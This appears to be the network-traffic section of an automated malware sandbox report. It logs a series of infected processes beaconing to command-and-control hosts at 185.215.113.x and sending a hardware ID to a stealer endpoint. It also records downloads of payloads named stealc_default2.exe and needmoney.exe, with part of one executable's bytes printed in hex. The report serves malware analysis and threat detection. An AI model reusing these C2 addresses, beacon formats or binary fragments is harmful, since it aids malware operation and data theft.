                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      64192.168.2.749819185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:52.274772882 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000005001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      65192.168.2.749820185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:52.911777973 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      66192.168.2.749823185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:54.551011086 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      67192.168.2.749824185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:56.089196920 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      68192.168.2.749825185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:58.345314026 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000005001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      69192.168.2.749826185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:35:58.882796049 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      70192.168.2.749827185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:00.398725033 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      71192.168.2.749828185.215.113.37806220C:\Users\user\1000015002\b74664dd7e.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:00.772636890 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 24, 2024 15:36:01.483053923 CEST203INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:36:01 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Sep 24, 2024 15:36:02.639880896 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----HJJEHJJKJEGHJJKEBFBG
                                                      Host: 185.215.113.37
                                                      Content-Length: 211
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 46 46 41 44 43 38 32 43 41 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 45 48 4a 4a 4b 4a 45 47 48 4a 4a 4b 45 42 46 42 47 2d 2d 0d 0a
                                                      Data Ascii: ------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="hwid"FFFADC82CA451388941053------HJJEHJJKJEGHJJKEBFBGContent-Disposition: form-data; name="build"save------HJJEHJJKJEGHJJKEBFBG--
                                                      Sep 24, 2024 15:36:03.003093958 CEST210INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:36:02 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 8
                                                      Keep-Alive: timeout=5, max=99
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                      Data Ascii: YmxvY2s=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      72192.168.2.749829185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:02.804361105 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      73192.168.2.749830185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:03.414634943 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 65 30 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: e0=1000005001&unit=246122658369
                                                      Sep 24, 2024 15:36:04.136327028 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0
                                                      Sep 24, 2024 15:36:04.183408976 CEST63OUTGET /inc/stealc_default2.exe HTTP/1.1
                                                      Host: 185.215.113.16
                                                      Sep 24, 2024 15:36:04.408562899 CEST1236INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:04 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 192000
                                                      Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
                                                      Connection: keep-alive
                                                      ETag: "66c9f4f9-2ee00"
                                                      Accept-Ranges: bytes
                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 98 e0 c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 90 64 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELfB"d@0$@<#$.textJ .rdata@@.data+!@.reloc*D#F@B
                                                      Sep 24, 2024 15:36:04.408612013 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 79 b9 41 00 70 c8 41 00 d9 c8 41 00 00 00 00
                                                      Data Ascii: yApAAUQEE}tMUUEEE]UEExMUMMM]UQSjh0hAj$bE
                                                      Sep 24, 2024 15:36:04.408665895 CEST448INData Raw: 8b 8d 10 fc ff ff 51 83 ec 0c 8b cc 8d 95 04 fc ff ff 52 e8 bb 8c 01 00 81 ec 88 00 00 00 8b cc 8d 45 08 50 e8 ca 00 00 00 8d 8d a4 fb ff ff 51 e8 9e 37 01 00 81 c4 a0 00 00 00 8d 8d a4 fb ff ff e8 ed 8c 01 00 8d 8d f8 fb ff ff e8 b2 8f 01 00 50
                                                      Data Ascii: QREPQ7PbjjRAM]UQMM|nMHcM<XM0MM]
                                                      Sep 24, 2024 15:36:04.408704042 CEST1236INData Raw: 7c e8 0d 8b 01 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc 83 c1 24 e8 4e 8b 01 00 8b 4d fc 83 c1 18 e8 43 8b 01 00 8b 4d fc 83 c1 0c e8 38 8b 01 00 8b 4d fc e8 30 8b 01 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc
                                                      Data Ascii: |E]UQMM$NMCM8M0]UQMEPMMQMURME$PM$wE]UthBMhBMEttW
                                                      Sep 24, 2024 15:36:04.408724070 CEST1236INData Raw: 88 01 00 8b c8 e8 45 88 01 00 50 8d 8d 94 fe ff ff e8 29 87 01 00 8d 8d 30 fd ff ff e8 7e 86 01 00 8d 8d 3c fd ff ff e8 73 86 01 00 8d 8d 48 fd ff ff e8 68 86 01 00 8d 8d 54 fd ff ff e8 5d 86 01 00 8d 8d 60 fd ff ff e8 52 86 01 00 83 ec 0c 8b cc
                                                      Data Ascii: EP)0~<sHhT]`RRlhBahVBPMQRhUBPbQ RPd
                                                      Sep 24, 2024 15:36:04.408756018 CEST1236INData Raw: 51 04 3b 55 0c 7c 05 8b 45 08 eb 0e 8b 45 08 8b 48 08 89 4d 08 eb d7 8b 45 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 33 d2 b9 00 10 00 00 f7 f1 85 d2 74 0c 8b 55 08 81 c2 00 10 00 00 89 55 08 8b 45 08 c1 e8 0c 5d c3
                                                      Data Ascii: Q;U|EEHME]UE3tUUE]UEEMQ+UUUEEMQ+UEPMUQEMHUEHJUztEHUQEMHUEE]Ub;EuMbU
                                                      Sep 24, 2024 15:36:04.408775091 CEST1236INData Raw: 00 83 c4 0c a3 18 cc 62 00 6a 0b 68 84 1d 42 00 68 90 1d 42 00 e8 1d 21 00 00 83 c4 0c a3 34 ce 62 00 6a 14 68 9c 1d 42 00 68 b4 1d 42 00 e8 04 21 00 00 83 c4 0c a3 bc c8 62 00 6a 0d 68 cc 1d 42 00 68 dc 1d 42 00 e8 eb 20 00 00 83 c4 0c a3 2c c9
                                                      Data Ascii: bjhBhB!4bjhBhB!bjhBhB ,bjhBhB bjhBh,B Pbjh<BhHB |bjhTBh`B bjhlBhxBn bjhBhBU (bjhBh
                                                      Sep 24, 2024 15:36:04.408792019 CEST1236INData Raw: 62 00 6a 14 68 64 22 42 00 68 7c 22 42 00 e8 50 1c 00 00 83 c4 0c a3 38 cd 62 00 6a 0e 68 94 22 42 00 68 a4 22 42 00 e8 37 1c 00 00 83 c4 0c a3 94 c9 62 00 6a 0e 68 b4 22 42 00 68 c4 22 42 00 e8 1e 1c 00 00 83 c4 0c a3 e4 cb 62 00 6a 18 68 d4 22
                                                      Data Ascii: bjhd"Bh|"BP8bjh"Bh"B7bjh"Bh"Bbjh"Bh"Bbjh#Bh #Bbjh4#Bh@#BbjhL#Bh\#Bbjhl#Bhx#B<bjh#Bh#BLbjh#Bh#Bo
                                                      Sep 24, 2024 15:36:04.408808947 CEST552INData Raw: 28 42 00 e8 87 17 00 00 83 c4 0c a3 24 ce 62 00 6a 14 68 ec 28 42 00 68 04 29 42 00 e8 6e 17 00 00 83 c4 0c a3 88 cb 62 00 6a 15 68 1c 29 42 00 68 34 29 42 00 e8 55 17 00 00 83 c4 0c a3 b4 c9 62 00 6a 0e 68 4c 29 42 00 68 5c 29 42 00 e8 3c 17 00
                                                      Data Ascii: (B$bjh(Bh)Bnbjh)Bh4)BUbjhL)Bh\)B<bjhl)Bh|)B#bjh)Bh)B,bjh)Bh)Bdbjh)Bh*B`bjh,*Bh<*BbjhL*Bh`*Bbj
                                                      Sep 24, 2024 15:36:04.408826113 CEST1236INData Raw: 00 e8 61 15 00 00 83 c4 0c a3 18 ca 62 00 6a 0d 68 2c 2c 42 00 68 3c 2c 42 00 e8 48 15 00 00 83 c4 0c a3 7c cd 62 00 6a 0b 68 4c 2c 42 00 68 58 2c 42 00 e8 2f 15 00 00 83 c4 0c a3 c0 c9 62 00 6a 0d 68 64 2c 42 00 68 74 2c 42 00 e8 16 15 00 00 83
                                                      Data Ascii: abjh,,Bh<,BH|bjhL,BhX,B/bjhd,Bht,B@bjh,Bh,Bbjh,Bh,Bbjh,Bh,B\bjh-Bh-B8bjh$-Bh8-BXbjhL-Bh`-BDbjht
                                                      Sep 24, 2024 15:36:04.408849001 CEST1236INData Raw: cb 62 00 6a 07 68 e4 32 42 00 68 ec 32 42 00 e8 7f 10 00 00 83 c4 0c a3 6c cb 62 00 6a 07 68 f4 32 42 00 68 fc 32 42 00 e8 66 10 00 00 83 c4 0c a3 28 cd 62 00 6a 07 68 04 33 42 00 68 0c 33 42 00 e8 4d 10 00 00 83 c4 0c a3 70 ca 62 00 6a 04 68 14
                                                      Data Ascii: bjh2Bh2Blbjh2Bh2Bf(bjh3Bh3BMpbjh3Bh3B4bjth83Bh3Bbjh(4Bh04Bbjh$3Bh84Bbjh,3Bh@4Bbj hL4Bhp4Bbjh4Bh4B


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      74192.168.2.749831185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:04.319169998 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      75192.168.2.749832185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:06.362869978 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:07.028717995 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      76192.168.2.749833185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:06.854923964 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000066001&unit=246122658369


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      77192.168.2.749834185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:09.863651037 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      78192.168.2.749835185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:11.520935059 CEST156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 4
                                                      Cache-Control: no-cache
                                                      Data Raw: 73 74 3d 73
                                                      Data Ascii: st=s
                                                      Sep 24, 2024 15:36:12.218111038 CEST219INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Refresh: 0; url = Login.php
                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 1 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      79192.168.2.749836185.215.113.16807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:11.897504091 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.16
                                                      Content-Length: 31
                                                      Cache-Control: no-cache
                                                      Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                      Data Ascii: d1=1000066001&unit=246122658369
                                                      Sep 24, 2024 15:36:12.609956980 CEST193INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:12 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 4 <c>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      80192.168.2.749837185.215.113.117807308C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:13.290662050 CEST58OUTGET /inc/needmoney.exe HTTP/1.1
                                                      Host: 185.215.113.117


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      81192.168.2.749838185.215.113.43807392C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:13.757631063 CEST316OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Host: 185.215.113.43
                                                      Content-Length: 162
                                                      Cache-Control: no-cache
                                                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35
                                                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
                                                      Sep 24, 2024 15:36:14.451442003 CEST196INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Tue, 24 Sep 2024 13:36:14 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 7 <c><d>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      82192.168.2.749839185.215.113.37804500C:\Users\user\1000015002\b74664dd7e.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:13.826378107 CEST89OUTGET / HTTP/1.1
                                                      Host: 185.215.113.37
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Sep 24, 2024 15:36:14.544519901 CEST203INHTTP/1.1 200 OK
                                                      Date: Tue, 24 Sep 2024 13:36:14 GMT
                                                      Server: Apache/2.4.52 (Ubuntu)
                                                      Content-Length: 0
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      83192.168.2.749840185.215.113.37804500C:\Users\user\1000015002\b74664dd7e.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 24, 2024 15:36:14.556447029 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                                      Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK
                                                      Host: 185.215.113.37
                                                      Content-Length: 211
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
